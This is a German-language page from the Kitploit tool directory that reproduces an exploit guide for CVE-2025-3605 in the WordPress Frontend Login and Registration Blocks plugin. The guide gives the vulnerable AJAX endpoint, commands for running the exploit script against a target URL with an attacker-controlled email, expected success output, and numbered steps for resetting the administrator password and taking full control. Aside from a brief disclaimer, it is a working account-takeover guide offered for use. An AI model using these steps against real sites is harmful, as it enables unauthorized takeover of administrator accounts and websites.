Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-3605 — WordPress Frontend Login and Registration Blocks Plugin <= 1.0.7 ist anfällig für Privilege Escalation. | Kitploit
Tools/GitHubGitHub/nxploited/cve-2025-3605
Privilege EscalationPasswortangriffeSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubnxploited/cve-2025-3605

CVE-2025-3605

WordPress Frontend Login and Registration Blocks Plugin <= 1.0.7 ist anfällig für Privilege Escalation.

Repository anzeigen
23vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🚀 CVE-2025-3605 Exploit-Anleitung

🛡️ Schwachstellenzusammenfassung

Das Frontend Login and Registration Blocks-Plugin für WordPress (Versionen <= 1.0.7) ist anfällig für Privilegienerhöhung durch Kontoübernahme.
Das Problem entsteht, weil das Plugin keine Benutzeridentität überprüft, wenn sensible Daten wie E-Mails über die Funktion flr_blocks_user_settings_handle_ajax_callback() aktualisiert werden.

✅ Auswirkungen:
Ein nicht authentifizierter Angreifer kann die E-Mail des Administrators ändern, den Prozess "Passwort vergessen" auslösen und das Admin-Passwort zurücksetzen, um die volle Kontrolle zu erlangen.


💥 Proof of Concept (PoC)

Das beigefügte Python-Skript automatisiert den Exploit-Prozess, indem es den anfälligen AJAX-Endpunkt angreift:

root@kitploit:~
/wp-admin/admin-ajax.php

Es aktualisiert die E-Mail des angegriffenen Benutzers (normalerweise user_id 1 für Admin) auf eine vom Angreifer kontrollierte E-Mail.


📦 Enthaltenes Skript

Dateiname: CVE-2025-3605.py

root@kitploit:~
python CVE-2025-3605.py --url http://target-site/wordpress --user_id 1 --mail [email protected]

✅ Standardwerte:

  • --user_id: 1 (Standard-Admin)
  • --mail: [email protected]

🖥️ Verwendung & Hilfe

Um das Hilfemenü anzuzeigen, führen Sie aus:

root@kitploit:~
python CVE-2025-3605.py --help

Ausgabe:

root@kitploit:~
[+] Starting exploit script...
usage: a.py [-h] --url URL [--user_id USER_ID] [--mail MAIL]

Frontend Login and Registration Blocks Plugin <= 1.0.7 is vulnerable to Privilege Escalation # By Nxploited (Khaled Alenazi)

options:
  -h, --help            show this help message and exit
  --url, -u URL         Target URL, e.g., http://192.168.100.74:888/wordpress
  --user_id, -id USER_ID
                        User ID to target (default: 1)
  --mail, -mail MAIL    Email to set (default: [email protected])

✅ Beispielausführung:

root@kitploit:~
python CVE-2025-3605.py -u http://192.168.100.74:888/wordpress -id 1 -mail [email protected]

🎯 Erwartete Ausgabe

✅ Bei Erfolg:

root@kitploit:~
[+] Starting exploit script...
[+] Sending exploit to http:/target.com/wp-admin/admin-ajax.php/wp-admin/admin-ajax.php
[+] Exploit successful! Response: {"status":true,"message":"Operation has been completed successfully."}
[+] Final Step: Go to the Forgot Password page and reset the admin password using the new email!
Exploit By : Khaled_alenazi ( Nxploited )

❌ Bei Fehlschlag:

root@kitploit:~
[!] Exploit failed. HTTP Status: 400
[!] Response: 0

🔑 Nach dem Exploit

1️⃣ Navigieren Sie zu:

root@kitploit:~
http://target-site/wordpress/wp-login.php

2️⃣ Geben Sie die neue E-Mail ein, die Sie gesetzt haben ([email protected]).

3️⃣ Fordern Sie eine Passwortzurücksetzung an.

4️⃣ Legen Sie ein neues Passwort fest.

5️⃣ Melden Sie sich als Administrator an und genießen Sie vollen Zugriff.


⚠️ Haftungsausschluss

Dieser Exploit und das Skript werden nur für Bildungs- und autorisierte Testzwecke bereitgestellt.
Jede unbefugte Nutzung gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben, ist illegal und unethisch.


By: Khaled Alenazi (Nxploited)

Tool herunterladen